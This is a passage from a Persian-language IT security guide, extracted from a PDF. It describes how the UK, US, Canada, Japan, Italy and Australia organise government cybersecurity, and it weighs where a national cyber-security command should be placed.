‫ﻛﻨﺪ‪ ،‬ﻫﺸﺪﺍﺭﻫﺎ ﻭ ﻭﺍﻛﻨـﺸﻬﺎﻱ ﻛﻤﻜـﻲ ﻻﺯﻡ ﺭﺍ ﺍﺭﺍﺋـﻪ ﻧﻤﺎﻳـﺪ‪ ،‬ﻭ ﺭﻭﺍﺑـﻂ‬
‫ﺑﺨﺶ ﺩﻭﻟﺘﻲ ﻭ ﺧﺼﻮﺻﻲ ﺭﺍ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺳﺎﺩﻩﺗﺮ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﺩﺭ ‪ NISCC‬ﻳــﻚ ﻣﺮﻛــﺰ ﻓﻮﺭﻳﺘﻬــﺎﻱ ﺍﻣﻨﻴــﺖ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺑــﻪ ﻧــﺎﻡ‬
‫‪ UNIRAS‬ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻳـﻚ ﺗـﻴﻢ ﻭﺍﻛـﻨﺶ ﺑـﻪ ﺣﻤـﻼﺕ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ )‪ (EARG‬ﺩﺭ ‪ NISCC‬ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﺗـﺎ ﺑـﻪ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫ﺣﺎﻭﻱ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﻭ ﺑﺨﺸﻬﺎﻱ ﺩﻭﻟﺘﻲ ﻛﻪ ﺍﺯ ﺣﻤـﻼﺕ ﺁﺳـﻴﺐ‬
‫ﻣﻲﺑﻴﻨﻨﺪ ﻛﻤﻚ ﻛﻨﺪ‪ UNIRAS .‬ﺑﻌﺪ ﺍﺯ ﺍﻣﻜﺎﻥ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﺣﻤﻼﺕ‪،‬‬
‫ﺑﻪ ﺗﻤﺎﻡ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﻭ ﺷـﺮﻛﺘﻬﺎﻱ ﺍﻧﮕﻠـﺴﺘﺎﻥ ﻫـﺸﺪﺍﺭ ﻣـﻲﺩﻫـﺪ‪ .‬ﺑـﺮﺍﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻫﺒﺮﺩ ﺩﻭﻟﺖ ﺍﻧﮕﻠﺴﺘﺎﻥ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕـﺎﻩ‬
‫ﻭﺏ ‪ NISCC‬ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬
‫‪http://www.niscc.gov.uk‬‬
‫‪Computer Security Division of the National‬‬
‫‪Institute of Standards & Technology‬‬
‫‪۲۵‬‬
‫ﻓﺮﻣﺎﻧﺪﻫﻲ ﻭ ﺳﺎﺯﻣﺎﻥ‬
‫ﺩﻓﺘﺮ "ﺣﻔﺎﻇﺖ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﻭ ﺁﻣـﺎﺩﮔﻲ ﺷـﺮﺍﻳﻂ ﺍﺿـﻄﺮﺍﺭﻱ"‬
‫ﻛﺎﻧﺎﺩﺍ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻣﺪﻧﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻭﺯﺍﺭﺕ ﺩﻓﺎﻉ ﻣﻠﻲ ﻓﻌﺎﻟﻴﺖ ﻣـﻲ‪-‬‬
‫ﻛﻨﺪ‪.‬‬
‫‪Home Office‬‬
‫‪۲۳‬‬
‫‪20‬‬
‫ﺍﺯ ﺑﻌﻀﻲ ﻣﻨﻈﺮﻫﺎ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻣﺪﻝ ﭘﻴﭽﻴﺪﻩﺍﻱ ﺑﺮﺍﻱ ﻫﻤﻜﺎﺭﻳﻬﺎ ﺩﺍﺭﺩ‬
‫ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻟﮕﻮﻱ ﺧﻮﺑﻲ ﺑﺮﺍﻱ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻧﺒﺎﺷﺪ‪ .‬ﺩﺭ‬
‫ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ "ﻛﻤﻴﺘﻪ ﺍﻣﻨﻴﺖ ﻣﻠﻲ" ﻣﺴﺌﻮﻝ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪ‪-‬‬
‫ﺍﻱ ﺩﺭ ﺑﺨﺶ ﺩﻭﻟﺘـﻲ ﻭ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ ﺍﺳـﺖ‪ ،‬ﺍﻣـﺎ ﻣﺮﻛـﺰ ﺩﻭﻟﺘـﻲ‬
‫ﻣﺪﻳﺮﻳﺖ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺴﺌﻮﻟﻴﺖ ﺑﺮﻧﺎﻣﻪﺭﻳـﺰﻱ ﺑـﺮﺍﻱ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﻭﻟﺖ ﺭﺍ ﺑﻪ ﺩﻓﺘﺮ ﻣﺪﻳﺮﻳﺖ ﻭ ﺑﻮﺩﺟﻪﺑﻨﺪﻱ ﻛـﺎﺥ ﺳـﻔﻴﺪ ﺩﺍﺩﻩ‪ ،‬ﻭ‬
‫ﺷــﻮﺭﺍﻱ ﺍﻣﻨﻴــﺖ ﻣﻠــﻲ ﺩﺭ ﻛــﺎﺥ ﺳــﻔﻴﺪ ﻧﻴــﺰ ﻣــﺴﺌﻮﻟﻴﺖ ﻫﻤﻜــﺎﺭﻱ ﺩﺭ‬
‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺭﺩ‪.‬‬
‫‪24‬‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬
‫ﺗﻤﺎﻣﻲ ﻣﻮﺿﻮﻋﺎﺗﻲ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼـﻚ ﻭ ﺑـﺰﺭﮒ‬
‫)‪SME‬ﻫــﺎ( ﺩﺭ ﺑﺨــﺶ ﺳــﻮﻡ ﻣــﻮﺭﺩ ﻣﻄﺎﻟﻌــﻪ ﻗــﺮﺍﺭ ﺩﺍﺩﻳــﻢ ﺩﺭ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﺘﻲ ﻧﻴﺰ ﻗﺎﺑـﻞ ﺍﺳـﺘﻔﺎﺩﻩ ﻫـﺴﺘﻨﺪ‪ .‬ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ‬
‫ﺷـــﺮﻛﺘﻬﺎ ﻧﻴﺎﺯﻣﻨـــﺪ ﻣﺤﺎﻓﻈـــﺖ ﺍﺯ ﺧـــﻮﺩ‪ ،‬ﺗﻬﻴـــﻪﻛﻨﻨـــﺪﮔﺎﻥ ﻭ‬
‫ﻣــﺼﺮﻑﻛﻨﻨــﺪﮔﺎﻥ ﻫــﺴﺘﻨﺪ‪ ،‬ﺩﻭﻟــﺖ ﻧﻴــﺰ ﺑﺎﻳــﺪ ﺍﺯ ﺳﻴــﺴﺘﻤﻬﺎ ﻭ‬
‫ﺷﻬﺮﻭﻧﺪﺍﻥ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺗﻬﺪﻳـﺪﻫﺎﻱ ﻓﻴﺰﻳﻜـﻲ ﻭ ﺗﻬﺪﻳـﺪﺍﺕ ﺍﻣﻨﻴـﺖ‬
‫ﺳﺎﻳﺒﺮ ﻣﺤﺎﻓﻈﺖ ﻧﻤﺎﻳـﺪ‪ .‬ﺩﻭﻟﺘﻬـﺎﻱ ﻣﺤﻠـﻲ ﻭ ﻣﻠـﻲ ﻧﻤـﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﺟﻠﻮﻱ ﺑﺤﺮﺍﻧﻬﺎﻱ ﺷﺪﻳﺪ ﻣﺜﻞ ﻭﻗﻮﻉ ﻭﻗﻔﻪ ﺩﺭ ﻋﻤﻠﻴﺎﺕ ﺭﺍﻳﺎﻧـﻪﺍﻱ‪،‬‬
‫ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻦ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺤﺮﻣﺎﻧﻪ ﻭ ﻳﺎ ﺳﺮﻗﺖ ﻣﻨـﺎﺑﻊ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺭﺍ‬
‫ﺑﮕﻴﺮﻧﺪ‪ .‬ﺍﻧﺘﺸﺎﺭ ﺍﺧﺒﺎﺭ ﺭﺧـﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑـﺮﺍﻱ ﻋﻤـﻮﻡ ﺑﺎﻋـﺚ‬
‫ﻛﺎﻫﺶ ﺍﻋﺘﻤﺎﺩ ﻣﺮﺩﻡ ﻣﻲﺷﻮﺩ ﻭ ﺗﺒﺪﻳﻞ ﺑﻪ ﻣﺎﻧﻌﻲ ﺑﺮﺍﻱ ﭘﻴـﺸﺮﻓﺖ‬
‫ﺍﻗﺪﺍﻣﺎﺕ ﺩﻭﻟﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ١٩‬ﻣﻲﮔﺮﺩﺩ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ‬
‫ﻻ ﺍﻭﻟـﻴﻦ ﻣـﺴﺌﻮﻟﻴﺖ ﺩﻭﻟـﺖ ﺩﺭ‬
‫ﺩﺭ ﻓﺼﻞ ﻗﺒﻞ ﺍﺷﺎﺭﻩ ﺷﺪ‪ ،‬ﻣﻌﻤـﻮ ﹰ‬
‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﻫﻤﺎﻥ "ﺗﻨﻈﻴﻢ ﺍﻣـﻮﺭ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺧـﻮﺩ" ﺁﻥ ﺍﺳـﺖ؛‬
‫ﺑﺪﻳﻦ ﻣﻌﻨـﺎ ﻛـﻪ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘـﻲ ﺩﺭ ﺗﻤـﺎﻣﻲ ﺳـﻄﻮﺡ )ﻣﻠـﻲ‪،‬‬
‫ﻣﻨﻄﻘﻪﺍﻱ ﻭ ﻣﺤﻠـﻲ( ﺑﺎﻳﺪ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ‬
‫ﺁﻧﺎﻥ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﺣﻔﺎﻇﺖ ﺑﻌﻤﻞ ﺁﻭﺭﻧﺪ‪ .‬ﺍﻳﻨﻜﺎﺭ ﺷـﺎﻣﻞ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ ﻭ ﻳﺎ ﻭﺯﺍﺭﺗﺨﺎﻧـﻪﻫـﺎ ﺍﺯ‬
‫ﺟﻤﻠﻪ ﻧﻴﺮﻭﻫـﺎﻱ ﻧﻈـﺎﻣﻲ ﻭ ﺍﻧﺘﻈـﺎﻣﻲ‪ ،‬ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﻬﺪﺍﺷـﺖ ﻭ‬
‫ﺳﻼﻣﺖ ﻋﻤﻮﻣﻲ‪ ،‬ﻣﺮﺍﻛـﺰ ﻭﺍﻛﻨـﺸﻬﺎﻱ ﺍﺿـﻄﺮﺍﺭﻱ‪ ،‬ﻭ ﻫﻤﭽﻨـﻴﻦ‬
‫ﺑﺎﻧﻜﻬﺎﻱ ﻣﺮﻛﺰﻱ ﻣﻲﺷﻮﺩ‪ .‬ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑـﻪ ﺩﻭﻟـﺖ ﻛـﻪ‬
‫ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺖ ﺑﺴﺘﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﭼﻪ ﭼﻴﺰﻱ ﺩﻭﻟﺘـﻲ ﻭ ﭼـﻪ‬
‫ﭼﻴﺰﻱ ﺧﺼﻮﺻﻲ ﻣﺤﺴﻮﺏ ﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺷـﺎﻣﻞ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﺁﺑﻲ‪ ،‬ﺳﺪﻫﺎﻱ ﻫﻴـﺪﺭﻭﺍﻟﻜﺘﺮﻳﻜﻲ‪ ،‬ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻛﻨﺘـﺮﻝ ﺗﺮﺍﻓﻴـﻚ‬
‫ﻫﻮﺍﻳﻲ ﻭ ﺳﺎﻳﺮ ﺍﻣﻜﺎﻧﺎﺕ ﻭ ﺗﺴﻬﻴﻼﺕ ﺑﺎﺷﻨﺪ‪.‬‬
‫•‬
‫ﻛﺎﻧﺎﺩﺍ ﺍﻋﺘﺒﺎﺭﺍﺕ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ‪ ٢٠‬ﺑـﻪ ﻭﺯﺍﺭﺕ‬
‫‪٢١‬‬
‫ﺩﻓﺎﻉ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫‪٢٣٦‬‬
‫ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺍﺟﺮﺍﻳﻲ ﻛﻪ ﺗﻮﺳﻂ ﺍﺩﺍﺭﺓ ﻣﻠﻲ ﺑـﺮﺍﻱ ﺍﻗﺘـﺼﺎﺩ‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﺍﻳﺠﺎﺩ ﺷﺪﻩ ﻭ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﻭﺯﺍﺭﺕ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ‬
‫‪٢٦‬‬
‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫•‬
‫ﺍﻳﺘﺎﻟﻴﺎ ﻳﻚ ﻛﻤﻴﺘﺔ ﺩﺍﺧﻠﻲ ﻭﺯﺍﺭﺗﻲ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﻣﺴﺌﻮﻻﻧﻪ‬
‫ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﻗﺮﺍﺭ ﺳﺎﺧﺘﻪ ﻛﻪ ﺗﻮﺳﻂ ﺩﭘﺎﺭﺗﻤـﺎﻥ ﻧـﻮﺁﻭﺭﻱ ﻭ‬
‫ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﺩﻓﺘﺮ ﻧﺨﺴﺖ ﻭﺯﻳﺮﻱ ﻣﺪﻳﺮﻳﺖ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫•‬
‫ﺩﺭ ﺳــﺎﻝ ‪ ۲۰۰۰‬ﻧﺨــﺴﺖ ﻭﺯﻳــﺮ ﮊﺍﭘــﻦ ﮔﺮﻭﻫــﻲ ﺭﺍ ﺑــﺮﺍﻱ‬
‫ﭘﺮﺩﺍﺧﺘﻦ ﺑﻪ ﻣﺴﺌﻠﻪ ﺍﻣﻨﻴﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﻛﺎﺑﻴﻨـﺔ‬
‫ﺩﻭﻟﺖ ﺍﻳﺠﺎﺩ ﻛﺮﺩ ﺗﺎ ﺑﻬﺘـﺮ ﺑﺘﻮﺍﻧـﺪ ﻣﻌﻴﺎﺭﻫـﺎ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻱ‬
‫ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻣﻴﺎﻥ ﻭﺯﻳﺮﺍﻥ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻫﻤﺎﻫﻨﮓ ﻧﻤﺎﻳﺪ‪ .‬ﺍﻳـﻦ‬
‫ﮔﺮﻭﻩ ﻣﺘﺸﻜﻞ ﺍﺯ ﻣﺘﺨﺼﺼﺎﻧﻲ ﺑﻮﺩ ﻛﻪ ﻋـﻀﻮ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﻭ‬
‫‪٢٧‬‬
‫ﻭﺯﺍﺭﺗﺨﺎﻧﻪﻫﺎﻱ ﻭﺍﺑﺴﺘﻪ ﻭ ﻧﻴﺰ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﻮﺩﻧﺪ‪.‬‬
‫ﺍﻧﺘﺨﺎﺏ ﻣﺤﻞ ﻓﺮﻣﺎﻧﺪﻫﻲ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺩﻭﻟـﺖ ﺍﻫﻤﻴـﺖ‬
‫ﺯﻳﺎﺩﻱ ﺩﺍﺭﺩ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺯﻣـﺎﻥ ﺍﻧﺘـﺸﺎﺭ‬
‫ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑـﺮﺍﻱ ﻋﻤـﻮﻡ‪،‬‬
‫ﻧﻴﺎﺯﻣﻨﺪ ﺑﺮﺭﺳﻴﻬﺎﻱ ﭼﻨﺪﺟﺎﻧﺒﻪ ﺍﺳﺖ‪ .‬ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﺍﻳﻦ ﻣﺴﺌﻮﻟﻴﺖ ﺩﺭ‬
‫ﻻ ﻣﺴﺌﻮﻝ ﺣﻔﻆ ﺍﺳﺮﺍﺭ ﺍﻣﻨﻴﺖ ﻣﻠـﻲ ﺍﺳـﺖ‬
‫ﻭﺯﺍﺭﺕ ﺩﻓﺎﻉ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻧﺘﺸﺎﺭ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺩﭼﺎﺭ ﺍﺧﺘﻼﻝ ﻛﻨﺪ ﻭ ﺑﺎﻋﺚ ﺷﻮﺩ‬
‫ﻣﻄﺎﻟﺐ ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﺑﺎﻻ ﺑﺮﺩﻥ ﺳﻄﺢ ﺁﮔﺎﻫﻴﻬﺎﻱ ﻋﻤﻮﻣﻲ ﻣﻨﺘـﺸﺮ‬
‫ﻧﺸﻮﺩ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻫﻤﻜﺎﺭﻱ ﺑﺨﺶ ﺩﻭﻟﺘـﻲ ﻭ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ‬
‫ﺟﺰﺀ ﻣﻬﻤﻲ ﺍﺯ ﺁﻧﭽﻪ ﻛـﻪ ﻣﻌﺘﻘـﺪﻳﻢ ﻣـﺆﺛﺮﻳﻦ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ‬
‫ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺍﺳﺖ ﻣﻲﺑﺎﺷﺪ‪ ،‬ﺷﺎﻳﺪ ﺑﻬﺘﺮ ﺑﺎﺷﺪ ﺭﻫﺒﺮﻱ ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺒﺮ‬
‫ﺩﺭ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺍﻗﺘﺼﺎﺩﻱ ﻳﺎ ﺷﺮﻛﺖ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺩﻭﻟـﺖ ﻭ ﺗﺤـﺖ‬
‫ﻧﻈﺎﺭﺕ ﺑﺎﻻﺗﺮﻳﻦ ﻣﻘﺎﻡ ﺍﺟﺮﺍﻳﻲ ﻛﺸﻮﺭ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪.‬‬
‫ﺍﻣﺎ ﻣﻬﻤﺘﺮ ﺍﺯ ﺍﻳﻨﻜﻪ ﻛﺪﺍﻡ ﺳﺎﺯﻣﺎﻥ ﻳـﺎ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳـﺪ ﻣـﺴﺌﻮﻟﻴﺖ‬
‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﮔﻴﺮﻧﺪ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﺑﺎﻳـﺪ ﻧـﻮﻋﻲ‬
‫"ﻓﺮﻣﺎﻧﺪﻫﻲ ﻣﻠﻲ" ﺍﻳﺠﺎﺩ ﺷﻮﺩ ﺗﺎ ﺑﺘﻮﺍﻥ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﻛـﺮﺩ ﻛـﻪ‬
‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﺯ ﺳﻮﻱ ﺍﺟﺰﺍﻱ ﺩﻭﻟﺖ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ ﻛـﺎﻓﻲ ﻣـﻮﺭﺩ‬
‫ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﺧﻮﺍﻫـﺪ ﮔﺮﻓـﺖ‪ .‬ﻫﻨﮕﺎﻣﻴﻜـﻪ ﺑـﻪ ﻭﺍﺭﺩ ﻛـﺮﺩﻥ ﻣﻘﻮﻟـﺔ‬
‫‪۲۶‬‬
‫‪۲۷‬‬
‫ﻃﺒﻖ ﻗﻮﺍﻧﻴﻦ ﺍﺳﺘﺮﺍﻟﻴﺎ‪ ،‬ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺍﺟﺮﺍﻳـﻲ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻏﻴـﺮ ﺟﺰﺍﻳـﻲ‬
‫ﻫﺴﺘﻨﺪ ﻭ ﻫﻨﮕﺎﻣﻲ ﻛﻪ ﻛﺎﺭ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﺣﻴﻄﻪ ﻛﻞ ﺩﻭﻟﺖ ﺑﺎﺷﺪ ﻭ ﻛﻤـﻲ‬
‫ﺍﺯ ﺳﺎﺧﺘﺎﺭ ﺩﻭﻟﺘﻲ ﻣﺴﺘﻘﻞ ﺑﺎﺷﻨﺪ‪ ،‬ﺑﺎﻳـﺪ ﺗﻮﺳـﻂ ﺑـﺎﻻﺗﺮﻳﻦ ﻣﻘـﺎﻡ ﺩﻭﻟﺘـﻲ‬
‫ﻣﺤﻠﻲ ﺗﺄﺳﻴﺲ ﺷﻮﻧﺪ‪ .‬ﺭﺋﻴﺲ ﺳﺎﺯﻣﺎﻥ ﺍﺟﺮﺍﻳﻲ ﺗﻮﺳﻂ ﻳـﻚ ﻭﺯﻳـﺮ ‪ -‬ﺩﺭ‬
‫ﺍﻳﻨﺠﺎ ﻭﺯﻳﺮ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ‪ -‬ﻣﻨﺼﻮﺏ ﻣﻲﺷـﻮﺩ ﻭ ﺗﻨﻬـﺎ‬
‫ﺑﻪ ﺍﻭ ﭘﺎﺳﺨﮕﻮﺳﺖ‪.‬‬
‫ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬
‫‪http://www.kantei.go.jp/foreign/it/security/2000‬‬
‫‪/0519taisei.html‬‬
‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻪ ﻭﺯﺍﺭﺗﺨﺎﻧﻪﻫﺎﻱ ﻣﻮﺟﻮﺩ ﻣﻲ ﺍﻧﺪﻳﺸﻴﻢ‪ ،‬ﺳﺆﺍﻻﺕ‬
‫ﺳﺎﺯﻣﺎﻧﻲ ﻣﻬﻤﻲ ﭘﻴﺶ ﻣﻲﺁﻳﻨﺪ ﻛﻪ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺁﻧﻬﺎ ﭘﺎﺳﺦ ﻣﻨﺎﺳـﺐ‬
‫ﭘﻴﺪﺍ ﻛﺮﺩ‪ .‬ﭼﻨﺎﻧﭽﻪ ﺗﻨﻬﺎ ﺍﺧﺘﻴـﺎﺭ ﺳـﺎﺯﻣﺎﻥ ﻫـﺪﺍﻳﺖﻛﻨﻨـﺪﺓ ﺍﻣﻨﻴـﺖ‬
‫ﺳﺎﻳﺒﺮ ‪ ،‬ﺗﺮﻏﻴﺐ ﻣﺮﺩﻡ ﻭ ﺍﻧﺘﺸﺎﺭ ﺍﻃﻼﻋـﺎﺕ ﺑـﺮﺍﻱ ﻋﻤـﻮﻡ ﺑﺎﺷـﺪ‪،‬‬
‫ﺍﺧﺘﻴﺎﺭ ﻋﻤﻠﻲ ﺁﻥ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺮ ﻭﺯﺍﺭﺗﺨﺎﻧـﻪﻫـﺎ ﻣﺤـﺪﻭﺩ‬
‫ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﺎﻳﺪ ﺭﻭﺷﻬﺎﻳﻲ ﺑﻮﺟﻮﺩ ﺁﻳﻨﺪ ﻛﻪ ﺑـﻪ ﺭﻫﺒـﺮﺍﻥ‬
‫ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺍﺟـﺎﺯﻩ ﺩﻫﻨـﺪ ﺍﻣﻨﻴـﺖ ﺭﺍ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﻮﺟـﻮﺩ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻭﺯﺍﺭﺗﺨﺎﻧﻪ ﻫﺎ ﺑﺮﻗﺮﺍﺭ ﺳﺎﺯﻧﺪ‪ .‬ﻳـﻚ ﺭﻭﺵ ﺑـﺮﺍﻱ ﺍﻟـﺰﺍﻡ‬
‫ﻭﺯﺍﺭﺗﺨﺎﻧﻪﻫﺎ ﺑـﻪ ﻣﻮﺍﻓﻘـﺖ ﺑـﺎ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻦ ﺑﺎﺷﺪ ﻛـﻪ ﻳـﻚ ﻣﻘـﺎﻡ ﻣـﺴﺌﻮﻝ ﺩﺭ ﺍﺩﺍﺭﺓ ﻣﺮﻛـﺰﻱ‬
‫ﺍﻣﻨﻴﺖ ﺩﺭ ﺩﻭﻟﺖ ﺑﺘﻮﺍﻧﺪ ﺳﻔﺎﺭﺷﺎﺕ ﺧﺮﻳﺪ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ ﻛﻪ ﺍﺯ‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺗﺒﻌﻴﺖ ﻧﻜﺮﺩﻩﺍﻧﺪ ﺭﺍ ﺭﺩ ﻛﻨﺪ‪.‬‬
‫ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺗﺎ ﺣﺪﻱ ﺍﻳـﻦ ﺭﻭﺵ ﺭﺍ ﺩﺭ ﭘـﻴﺶ ﮔﺮﻓﺘـﻪ ﻭ ﺣـﻖ‬
